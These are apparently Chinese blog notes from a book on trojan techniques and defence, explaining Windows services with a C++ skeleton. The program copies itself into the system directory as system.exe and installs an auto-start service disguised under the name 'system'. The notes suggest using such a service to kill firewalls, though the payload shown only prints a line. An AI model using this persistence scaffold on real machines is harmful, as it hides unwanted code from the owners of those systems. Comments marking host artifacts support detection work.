木马隐藏技术(2) -- 服务
此为《木马技术揭秘与防御》系列读书笔记
windows 服务
包括四大部分:
- 服务控制管理器 Service Control Manager
- 服务控制程序 Service Control Program
- 服务程序 Service Program
- 服务配置程序 Service Configuration Program
使用服务的好处:
- 可以“自启动”,多了一种自启动方式
- 在用户登录前开始运行,可以在服务启动时加入杀防火墙的代码
- 在后台运行,不容易被用户发现
常用Windows API:
SC_HANDLE WINAPI OpenSCManager(
__in_opt LPCTSTR lpMachineName, // If the pointer is NULL or points to an empty string, the function connects to the service control manager on the local computer.
__in_opt LPCTSTR lpDatabaseName, // 数据库 If it is NULL, the SERVICES_ACTIVE_DATABASE database is opened by default.
__in DWORD dwDesiredAccess // SC_MANAGER_ALL_ACCESS
);
SCManager:服务控制管理器
包含几方面的信息:
1.已安装服务数据库:在注册表中拥有一个已安装服务的数据库,位于:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
2.自启动服务:系统启动时,SCManager 启动所有启动类型为“自动”的服务,和相关依赖服务。在注册表中的位置为:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceGroupOrder
3.服务记录列表:包含每个服务的一堆属性
4.因要求而启动的服务、服务控制管理器句柄 等等。
SERVICE_STATUS_HANDLE WINAPI RegisterServiceCtrlHandler( //Registers a function to handle service control requests.
__in LPCTSTR lpServiceName,
__in LPHANDLER_FUNCTION lpHandlerProc
);
注册处理服务控制请求的函数指针
BOOL WINAPI SetServiceStatus( // Updates the service control manager's status information for the calling service.
__in SERVICE_STATUS_HANDLE hServiceStatus,
__in LPSERVICE_STATUS lpServiceStatus
);
设置服务的状态,SERVICE_STATUS 结构体的成员真多,不过大部分给默认值0就可以了。
SC_HANDLE WINAPI CreateService(
__in SC_HANDLE hSCManager, //利用 OpenSCManager 获得SCManager句柄
__in LPCTSTR lpServiceName, // 自己定义,作为服务名显示
__in_opt LPCTSTR lpDisplayName, // 自己定义,出现在服务的描述栏
__in DWORD dwDesiredAccess, // 给 SC_MANAGER_ALL_ACCESS
__in DWORD dwServiceType,
__in DWORD dwStartType,
__in DWORD dwErrorControl,
__in_opt LPCTSTR lpBinaryPathName,
__in_opt LPCTSTR lpLoadOrderGroup,
__out_opt LPDWORD lpdwTagId,
__in_opt LPCTSTR lpDependencies,
__in_opt LPCTSTR lpServiceStartName,
__in_opt LPCTSTR lpPassword
);
创建服务。
代码示例:
// Minimal Win32 service skeleton from the book notes.  The same executable
// (1) copies itself into the system directory as system.exe, (2) registers
// that copy as an auto-start service named "system", and (3) when started
// by the Service Control Manager runs ServiceMain, whose only work is the
// one-line door() body.  Comments below point out where each artifact is
// created (useful when looking for this kind of persistence on a host) and
// where the control flow is incomplete.
#include <iostream>
#include <windows.h>
#include <string>
#include <string.h>
#include <winsvc.h>

using namespace std;

BOOL InstallCmdService();
void RemoveCmdService();
void WINAPI ServiceMain(DWORD,LPTSTR *);
void WINAPI ServiceCtrlHandle(DWORD);
void door();

// Shared between ServiceMain and ServiceCtrlHandle: the status record that
// is reported to the SCM and the handle returned by RegisterServiceCtrlHandler.
SERVICE_STATUS m_ServiceStatus;
SERVICE_STATUS_HANDLE m_ServiceStatusHandle;
// Written in ServiceMain and ServiceCtrlHandle; nothing in this listing reads it.
BOOL bRunning = true;

// Entry point.  "-i" installs the service, "-r" removes it.  Either way the
// function then calls StartServiceCtrlDispatcher, which is what the SCM
// expects when *it* launches the binary; the call's return value is not checked.
int main(int argc,char* argv[])
{
    // Service-name -> ServiceMain mapping handed to the SCM.  The name must
    // match the one passed to CreateService/RegisterServiceCtrlHandler.
    SERVICE_TABLE_ENTRYA DispatchTable[] =
    {
        {"system",ServiceMain},
        {NULL,NULL}
    };

    if(2 == argc){
        if(!stricmp(argv[1],"-i")){
            InstallCmdService();
        }
        if(!stricmp(argv[1],"-r")){
            RemoveCmdService();
        }
    }
    StartServiceCtrlDispatcher(DispatchTable);
    return 0;
}

// Called by the SCM on the service's own thread.  Fills in m_ServiceStatus,
// registers the control handler, reports SERVICE_RUNNING and then runs door().
// Note: SERVICE_START_PENDING is stored locally but never reported via
// SetServiceStatus; the first report to the SCM is already SERVICE_RUNNING.
// When door() returns this function returns too, so the service body is
// whatever door() does.
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR * lpArgv)
{
    m_ServiceStatus.dwCheckPoint = 0;
    m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
    m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    m_ServiceStatus.dwServiceSpecificExitCode = 0;
    m_ServiceStatus.dwServiceType = SERVICE_WIN32;
    m_ServiceStatus.dwWaitHint = 0;
    m_ServiceStatus.dwWin32ExitCode = 0;

    // Registers ServiceCtrlHandle for control requests (stop/pause/...).
    m_ServiceStatusHandle = RegisterServiceCtrlHandler("system",ServiceCtrlHandle);
    if(m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0){
        return;
    }
    m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    m_ServiceStatus.dwCheckPoint = 0;
    m_ServiceStatus.dwWaitHint = 0;
    if(SetServiceStatus(m_ServiceStatusHandle,&m_ServiceStatus)){
        bRunning = true;
    }
    door();
}

// Control handler.  Only SERVICE_CONTROL_STOP is actually reported back to
// the SCM with SetServiceStatus; PAUSE and CONTINUE just change the local
// struct, so the SCM's view of the service does not follow them.
// INTERROGATE is accepted and ignored.
void WINAPI ServiceCtrlHandle(DWORD Opcode)
{
    switch(Opcode){
    case SERVICE_CONTROL_PAUSE:
        m_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
    case SERVICE_CONTROL_CONTINUE:
        m_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
    case SERVICE_CONTROL_STOP:
        m_ServiceStatus.dwWin32ExitCode = 0;
        m_ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        m_ServiceStatus.dwCheckPoint = 0;
        m_ServiceStatus.dwWaitHint = 0;
        SetServiceStatus(m_ServiceStatusHandle,&m_ServiceStatus);
        bRunning = false;
        break;
    case SERVICE_CONTROL_INTERROGATE:
        break;
    }
}

// Installer.  Copies the running executable to <system dir>\system.exe and
// creates an auto-start service named "system" pointing at that copy.
// Returns TRUE only when CreateService succeeded.
// Host artifacts produced here: the new file in the system directory and a new
// entry in the SCM's service database (the registry path quoted in the notes
// above).  The SCM handle schSCManager is never closed on any return path.
BOOL InstallCmdService()
{
    char strDir[1024];
    SC_HANDLE schSCManager,schService;

    // The current-directory value is immediately overwritten by the
    // GetModuleFileName call below, so it is effectively unused.
    GetCurrentDirectory(1024,strDir);
    // If first parameter is NULL, GetModuleFileName retrieves the path of the executable file of the current process.
    GetModuleFileName(NULL,strDir,sizeof(strDir));

    char chSysPath[1024];
    GetSystemDirectory(chSysPath,sizeof(chSysPath));
    strcat(chSysPath,"\\system.exe");

    cout<<"strdir:"<<strDir<<endl;
    cout<<"sysPath:"<<chSysPath<<endl;
    // Third argument false = overwrite an existing system.exe.  Failure is
    // only reflected by the missing success message; installation continues.
    if(CopyFile(strDir,chSysPath,false)){
        cout<<"Copy file success!"<<endl;
    }
    // From here on strDir holds the destination path, which becomes the
    // service's binary path.
    strcpy(strDir,chSysPath);
    schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager == NULL){
        cout<<"open scmanager failed! may be you have no privilege to do this."<<endl;
        return false;
    }

    LPCSTR lpBinaryPathName = strDir;
    // SERVICE_AUTO_START: the SCM starts it at boot (see the notes above).
    // NOTE(review): the dwDesiredAccess argument is SC_MANAGER_ALL_ACCESS,
    // an SCM-scope constant; the service-object rights are the SERVICE_*
    // values (e.g. SERVICE_ALL_ACCESS) — verify against the API docs.
    schService = CreateService(schSCManager,"system","system",SC_MANAGER_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_NORMAL,lpBinaryPathName,
        NULL,NULL,NULL,NULL,NULL);

    // On failure nothing is printed and schSCManager is leaked.
    if(schService){
        cout<<"install service success!"<<endl;
    }else{
        return false;
    }
    CloseServiceHandle(schService);
    return true;
}

// Uninstaller: opens the "system" service, asks it to stop if it is not
// already stopped, waits a fixed 500 ms, then deletes it.
// NOTE(review): every failure here only prints a message and falls through,
// so a NULL scm or service handle is still passed to the following calls.
void RemoveCmdService()
{
    SC_HANDLE scm,service;
    char name[100];
    SERVICE_STATUS status;
    strcpy(name,"system");

    if((scm = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS)) == NULL){
        cout<<"OpenSCManager Error"<<endl;
    }

    // Same access-constant mix as in InstallCmdService (SC_MANAGER_* used as
    // a service right); DELETE is the right DeleteService needs.
    service = OpenService(scm,name,SC_MANAGER_ALL_ACCESS|DELETE);
    if(!service){
        cout<<"OpenService Failed"<<endl;
    }

    // If this query fails, status is read below uninitialized.
    BOOL bSuccess = QueryServiceStatus(service,&status);
    if(!bSuccess){
        cout<<"QueryServiceStatus ERROR"<<endl;
    }

    if(status.dwCurrentState != SERVICE_STOPPED){
        bSuccess = ControlService(service,SERVICE_CONTROL_STOP,&status);
        if(!bSuccess){
            cout<<"ControlService ERROR!"<<endl;
        }
        // Fixed delay instead of polling the status until SERVICE_STOPPED.
        Sleep(500);
    }

    // Marks the service for deletion; the SCM removes it once all handles
    // to it are closed (the CloseServiceHandle calls below).
    bSuccess = DeleteService(service);
    if(!bSuccess){
        cout<<"delete service error"<<endl;
    }else{
        cout<<"delete service success!"<<endl;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(scm);
}

// Placeholder service body: prints one line and returns, after which
// ServiceMain returns as well.
void door()
{
    cout<<"hi, trojan is running, haha!"<<endl;
}
使用方法:
编译的程序为hi.exe
1.安装服务:hi -i
hi.exe会被copy到%system%路径下,并命名为system.exe。安装的服务名为system
2.启动服务:net start system
3.卸载服务:hi -r